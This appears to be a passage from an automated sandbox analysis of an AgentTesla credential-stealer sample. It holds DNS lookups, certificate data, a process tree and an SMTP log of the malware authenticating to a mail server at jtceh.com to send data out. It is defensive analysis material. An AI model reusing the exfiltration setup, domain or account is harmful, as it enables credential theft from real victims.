                              Nov 25, 2020 03:43:26.815829039 CET53589878.8.8.8192.168.2.3
                              Nov 25, 2020 03:43:59.166819096 CET5657953192.168.2.38.8.8.8
                              Nov 25, 2020 03:43:59.194155931 CET53565798.8.8.8192.168.2.3
                              Nov 25, 2020 03:44:00.512402058 CET6063353192.168.2.38.8.8.8
                              Nov 25, 2020 03:44:00.555957079 CET53606338.8.8.8192.168.2.3
                              Nov 25, 2020 03:44:40.850955963 CET6129253192.168.2.38.8.8.8
                              Nov 25, 2020 03:44:40.878197908 CET53612928.8.8.8192.168.2.3
                              Nov 25, 2020 03:44:40.891051054 CET6361953192.168.2.38.8.8.8
                              Nov 25, 2020 03:44:40.918237925 CET53636198.8.8.8192.168.2.3
                              Nov 25, 2020 03:44:45.736259937 CET6493853192.168.2.38.8.8.8
                              Nov 25, 2020 03:44:45.778491974 CET53649388.8.8.8192.168.2.3
                              Nov 25, 2020 03:45:16.551387072 CET6194653192.168.2.38.8.8.8
                              Nov 25, 2020 03:45:16.609868050 CET53619468.8.8.8192.168.2.3
                              Nov 25, 2020 03:45:17.087902069 CET6491053192.168.2.38.8.8.8
                              Nov 25, 2020 03:45:17.128082037 CET53649108.8.8.8192.168.2.3
                              Nov 25, 2020 03:45:17.604422092 CET5212353192.168.2.38.8.8.8
                              Nov 25, 2020 03:45:17.642211914 CET53521238.8.8.8192.168.2.3
                              Nov 25, 2020 03:45:17.997046947 CET5613053192.168.2.38.8.8.8
                              Nov 25, 2020 03:45:18.032824039 CET53561308.8.8.8192.168.2.3
                              Nov 25, 2020 03:45:18.407149076 CET5633853192.168.2.38.8.8.8
                              Nov 25, 2020 03:45:18.442859888 CET53563388.8.8.8192.168.2.3
                              Nov 25, 2020 03:45:18.857722044 CET5942053192.168.2.38.8.8.8
                              Nov 25, 2020 03:45:18.893817902 CET53594208.8.8.8192.168.2.3
                              Nov 25, 2020 03:45:20.199269056 CET5878453192.168.2.38.8.8.8
                              Nov 25, 2020 03:45:20.234807968 CET53587848.8.8.8192.168.2.3
                              Nov 25, 2020 03:45:21.993962049 CET6397853192.168.2.38.8.8.8
                              Nov 25, 2020 03:45:22.029191017 CET53639788.8.8.8192.168.2.3
                              Nov 25, 2020 03:45:22.639784098 CET6293853192.168.2.38.8.8.8
                              Nov 25, 2020 03:45:22.675499916 CET53629388.8.8.8192.168.2.3
                              Nov 25, 2020 03:45:23.439472914 CET5570853192.168.2.38.8.8.8
                              Nov 25, 2020 03:45:23.474720955 CET53557088.8.8.8192.168.2.3
                              Nov 25, 2020 03:47:12.841329098 CET5680353192.168.2.38.8.8.8
                              Nov 25, 2020 03:47:12.894303083 CET53568038.8.8.8192.168.2.3
                              Nov 25, 2020 03:47:13.085151911 CET5714553192.168.2.38.8.8.8
                              Nov 25, 2020 03:47:13.120682001 CET53571458.8.8.8192.168.2.3
                              Nov 25, 2020 03:47:13.526247978 CET5535953192.168.2.38.8.8.8
                              Nov 25, 2020 03:47:13.572169065 CET53553598.8.8.8192.168.2.3
                              Nov 25, 2020 03:47:16.828608036 CET5830653192.168.2.38.8.8.8
                              Nov 25, 2020 03:47:16.880084038 CET53583068.8.8.8192.168.2.3
                              Nov 25, 2020 03:47:19.916198969 CET6412453192.168.2.38.8.8.8
                              Nov 25, 2020 03:47:19.967411995 CET53641248.8.8.8192.168.2.3
                              Nov 25, 2020 03:47:20.179048061 CET4936153192.168.2.38.8.8.8
                              Nov 25, 2020 03:47:20.214621067 CET53493618.8.8.8192.168.2.3
                              Nov 25, 2020 03:49:30.162890911 CET6315053192.168.2.38.8.8.8
                              Nov 25, 2020 03:49:30.190217018 CET53631508.8.8.8192.168.2.3
                              Nov 25, 2020 03:49:30.626329899 CET5327953192.168.2.38.8.8.8
                              Nov 25, 2020 03:49:30.653491974 CET53532798.8.8.8192.168.2.3
                              Nov 25, 2020 03:50:03.209068060 CET5688153192.168.2.38.8.8.8
                              Nov 25, 2020 03:50:03.252847910 CET53568818.8.8.8192.168.2.3

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                              Nov 25, 2020 03:42:44.417468071 CET192.168.2.38.8.8.80xdbc7Standard query (0)jtceh.comA (IP address)IN (0x0001)
                              Nov 25, 2020 03:43:08.914177895 CET192.168.2.38.8.8.80xfa94Standard query (0)jtceh.comA (IP address)IN (0x0001)
                              Nov 25, 2020 03:44:40.850955963 CET192.168.2.38.8.8.80xbf1dStandard query (0)api.ipify.orgA (IP address)IN (0x0001)
                              Nov 25, 2020 03:44:40.891051054 CET192.168.2.38.8.8.80xf409Standard query (0)api.ipify.orgA (IP address)IN (0x0001)
                              Nov 25, 2020 03:44:45.736259937 CET192.168.2.38.8.8.80x82feStandard query (0)mail.jtceh.comA (IP address)IN (0x0001)

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                              Nov 25, 2020 03:42:44.454144955 CET8.8.8.8192.168.2.30xdbc7No error (0)jtceh.com162.213.255.53A (IP address)IN (0x0001)
                              Nov 25, 2020 03:43:08.956548929 CET8.8.8.8192.168.2.30xfa94No error (0)jtceh.com162.213.255.53A (IP address)IN (0x0001)
                              Nov 25, 2020 03:44:40.878197908 CET8.8.8.8192.168.2.30xbf1dNo error (0)api.ipify.orgnagano-19599.herokussl.comCNAME (Canonical name)IN (0x0001)
                              Nov 25, 2020 03:44:40.878197908 CET8.8.8.8192.168.2.30xbf1dNo error (0)nagano-19599.herokussl.comelb097307-934924932.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                              Nov 25, 2020 03:44:40.878197908 CET8.8.8.8192.168.2.30xbf1dNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com184.73.247.141A (IP address)IN (0x0001)
                              Nov 25, 2020 03:44:40.878197908 CET8.8.8.8192.168.2.30xbf1dNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.243.161.145A (IP address)IN (0x0001)
                              Nov 25, 2020 03:44:40.878197908 CET8.8.8.8192.168.2.30xbf1dNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com50.19.252.36A (IP address)IN (0x0001)
                              Nov 25, 2020 03:44:40.878197908 CET8.8.8.8192.168.2.30xbf1dNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.225.153.147A (IP address)IN (0x0001)
                              Nov 25, 2020 03:44:40.878197908 CET8.8.8.8192.168.2.30xbf1dNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.235.142.93A (IP address)IN (0x0001)
                              Nov 25, 2020 03:44:40.878197908 CET8.8.8.8192.168.2.30xbf1dNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.252.4A (IP address)IN (0x0001)
                              Nov 25, 2020 03:44:40.878197908 CET8.8.8.8192.168.2.30xbf1dNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com174.129.214.20A (IP address)IN (0x0001)
                              Nov 25, 2020 03:44:40.878197908 CET8.8.8.8192.168.2.30xbf1dNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.126.66A (IP address)IN (0x0001)
                              Nov 25, 2020 03:44:40.918237925 CET8.8.8.8192.168.2.30xf409No error (0)api.ipify.orgnagano-19599.herokussl.comCNAME (Canonical name)IN (0x0001)
                              Nov 25, 2020 03:44:40.918237925 CET8.8.8.8192.168.2.30xf409No error (0)nagano-19599.herokussl.comelb097307-934924932.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                              Nov 25, 2020 03:44:40.918237925 CET8.8.8.8192.168.2.30xf409No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com184.73.247.141A (IP address)IN (0x0001)
                              Nov 25, 2020 03:44:40.918237925 CET8.8.8.8192.168.2.30xf409No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.243.161.145A (IP address)IN (0x0001)
                              Nov 25, 2020 03:44:40.918237925 CET8.8.8.8192.168.2.30xf409No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com50.19.252.36A (IP address)IN (0x0001)
                              Nov 25, 2020 03:44:40.918237925 CET8.8.8.8192.168.2.30xf409No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.225.153.147A (IP address)IN (0x0001)
                              Nov 25, 2020 03:44:40.918237925 CET8.8.8.8192.168.2.30xf409No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.235.142.93A (IP address)IN (0x0001)
                              Nov 25, 2020 03:44:40.918237925 CET8.8.8.8192.168.2.30xf409No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.252.4A (IP address)IN (0x0001)
                              Nov 25, 2020 03:44:40.918237925 CET8.8.8.8192.168.2.30xf409No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com174.129.214.20A (IP address)IN (0x0001)
                              Nov 25, 2020 03:44:40.918237925 CET8.8.8.8192.168.2.30xf409No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.126.66A (IP address)IN (0x0001)
                              Nov 25, 2020 03:44:45.778491974 CET8.8.8.8192.168.2.30x82feNo error (0)mail.jtceh.com162.213.255.53A (IP address)IN (0x0001)
                              Nov 25, 2020 03:47:12.894303083 CET8.8.8.8192.168.2.30x4591No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                              Nov 25, 2020 03:49:30.190217018 CET8.8.8.8192.168.2.30xd119No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.trafficmanager.netCNAME (Canonical name)IN (0x0001)

                              HTTPS Packets

                              TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                              Nov 25, 2020 03:42:44.828505993 CET162.213.255.53443192.168.2.349723CN=jtceh.com CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBSun Nov 22 01:00:00 CET 2020 Fri Nov 02 01:00:00 CET 2018 Tue Mar 12 01:00:00 CET 2019Tue Nov 23 00:59:59 CET 2021 Wed Jan 01 00:59:59 CET 2031 Mon Jan 01 00:59:59 CET 2029771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                              CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GBCN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USFri Nov 02 01:00:00 CET 2018Wed Jan 01 00:59:59 CET 2031
                              CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Mar 12 01:00:00 CET 2019Mon Jan 01 00:59:59 CET 2029
                              Nov 25, 2020 03:43:09.335922956 CET162.213.255.53443192.168.2.349729CN=jtceh.com CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBSun Nov 22 01:00:00 CET 2020 Fri Nov 02 01:00:00 CET 2018 Tue Mar 12 01:00:00 CET 2019Tue Nov 23 00:59:59 CET 2021 Wed Jan 01 00:59:59 CET 2031 Mon Jan 01 00:59:59 CET 2029771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                              CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GBCN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USFri Nov 02 01:00:00 CET 2018Wed Jan 01 00:59:59 CET 2031
                              CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Mar 12 01:00:00 CET 2019Mon Jan 01 00:59:59 CET 2029
                              Nov 25, 2020 03:44:41.145215034 CET184.73.247.141443192.168.2.349737CN=*.ipify.org, OU=PositiveSSL Wildcard, OU=Domain Control Validated CN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBWed Jan 24 01:00:00 CET 2018 Wed Feb 12 01:00:00 CET 2014 Tue Jan 19 01:00:00 CET 2010Sun Jan 24 00:59:59 CET 2021 Mon Feb 12 00:59:59 CET 2029 Tue Jan 19 00:59:59 CET 2038771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,03b5074b1b5d032e5620f69f9f700ff0e
                              CN=COMODO RSA Domain Validation Secure Server CA, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBWed Feb 12 01:00:00 CET 2014Mon Feb 12 00:59:59 CET 2029
                              CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Jan 19 01:00:00 CET 2010Tue Jan 19 00:59:59 CET 2038

                              SMTP Packets

                              TimestampSource PortDest PortSource IPDest IPCommands
                              Nov 25, 2020 03:44:46.333580017 CET58749738162.213.255.53192.168.2.3220-server148.web-hosting.com ESMTP Exim 4.93 #2 Tue, 24 Nov 2020 21:44:46 -0500
                              220-We do not authorize the use of this system to transport unsolicited,
                              220 and/or bulk e-mail.
                              Nov 25, 2020 03:44:46.334391117 CET49738587192.168.2.3162.213.255.53EHLO 226546
                              Nov 25, 2020 03:44:46.502772093 CET58749738162.213.255.53192.168.2.3250-server148.web-hosting.com Hello 226546 [84.17.52.25]
                              250-SIZE 52428800
                              250-8BITMIME
                              250-PIPELINING
                              250-AUTH PLAIN LOGIN
                              250-STARTTLS
                              250 HELP
                              Nov 25, 2020 03:44:46.505415916 CET49738587192.168.2.3162.213.255.53AUTH login b2ZmaWNlc2FsZXNAanRjZWguY29t
                              Nov 25, 2020 03:44:46.674171925 CET58749738162.213.255.53192.168.2.3334 UGFzc3dvcmQ6
                              Nov 25, 2020 03:44:46.869170904 CET58749738162.213.255.53192.168.2.3235 Authentication succeeded
                              Nov 25, 2020 03:44:46.870492935 CET49738587192.168.2.3162.213.255.53MAIL FROM:<officesales@jtceh.com>
                              Nov 25, 2020 03:44:47.039110899 CET58749738162.213.255.53192.168.2.3250 OK
                              Nov 25, 2020 03:44:47.039941072 CET49738587192.168.2.3162.213.255.53RCPT TO:<officesales@jtceh.com>
                              Nov 25, 2020 03:44:47.217489958 CET58749738162.213.255.53192.168.2.3250 Accepted
                              Nov 25, 2020 03:44:47.217869997 CET49738587192.168.2.3162.213.255.53DATA
                              Nov 25, 2020 03:44:47.386503935 CET58749738162.213.255.53192.168.2.3354 Enter message, ending with "." on a line by itself
                              Nov 25, 2020 03:44:47.387752056 CET49738587192.168.2.3162.213.255.53.
                              Nov 25, 2020 03:44:47.561041117 CET58749738162.213.255.53192.168.2.3250 OK id=1khknX-002jrM-9r
                              Nov 25, 2020 03:46:25.746232986 CET49738587192.168.2.3162.213.255.53QUIT
                              Nov 25, 2020 03:46:25.916059017 CET58749738162.213.255.53192.168.2.3221 server148.web-hosting.com closing connection

                              Code Manipulations

                              Statistics

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Start time:03:42:27
                              Start date:25/11/2020
                              Path:C:\Users\user\Desktop\PO_010-240.exe
                              Wow64 process (32bit):true
                              Commandline:'C:\Users\user\Desktop\PO_010-240.exe'
                              Imagebase:0x400000
                              File size:69632 bytes
                              MD5 hash:9C827B2D04FD53E767EE0D2413D99185
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:Visual Basic
                              Reputation:low

                              General

                              Start time:03:42:35
                              Start date:25/11/2020
                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                              Wow64 process (32bit):true
                              Commandline:'C:\Users\user\Desktop\PO_010-240.exe'
                              Imagebase:0x580000
                              File size:64616 bytes
                              MD5 hash:6FD7592411112729BF6B1F2F6C34899F
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Yara matches:
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.292786482.000000001D4F1000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.292786482.000000001D4F1000.00000004.00000001.sdmp, Author: Joe Security
                              Reputation:moderate

                              General

                              Start time:03:42:35
                              Start date:25/11/2020
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff6b2800000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Start time:03:42:53
                              Start date:25/11/2020
                              Path:C:\Users\user\sore\PREIMBUED.exe
                              Wow64 process (32bit):true
                              Commandline:'C:\Users\user\sore\PREIMBUED.exe'
                              Imagebase:0x400000
                              File size:69632 bytes
                              MD5 hash:9C827B2D04FD53E767EE0D2413D99185
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:Visual Basic
                              Antivirus matches:
                              • Detection: 41%, ReversingLabs
                              Reputation:low

                              General

                              Start time:03:43:00
                              Start date:25/11/2020
                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                              Wow64 process (32bit):true
                              Commandline:'C:\Users\user\sore\PREIMBUED.exe'
                              Imagebase:0xba0000
                              File size:64616 bytes
                              MD5 hash:6FD7592411112729BF6B1F2F6C34899F
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Yara matches:
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1283147601.000000001DB51000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1283147601.000000001DB51000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1283218914.000000001DBA6000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1283218914.000000001DBA6000.00000004.00000001.sdmp, Author: Joe Security
                              Reputation:moderate

                              General

                              Start time:03:43:02
                              Start date:25/11/2020
                              Path:C:\Users\user\sore\PREIMBUED.exe
                              Wow64 process (32bit):true
                              Commandline:'C:\Users\user\sore\PREIMBUED.exe'
                              Imagebase:0x400000
                              File size:69632 bytes
                              MD5 hash:9C827B2D04FD53E767EE0D2413D99185
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:Visual Basic
                              Reputation:low

                              General

                              Start time:03:43:02
                              Start date:25/11/2020
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff6b2800000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Start time:03:43:08
                              Start date:25/11/2020
                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                              Wow64 process (32bit):true
                              Commandline:'C:\Users\user\sore\PREIMBUED.exe'
                              Imagebase:0xd50000
                              File size:64616 bytes
                              MD5 hash:6FD7592411112729BF6B1F2F6C34899F
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate

                              General

                              Start time:03:43:09
                              Start date:25/11/2020
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff6b2800000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Disassembly

                              Code Analysis

                              Reset < >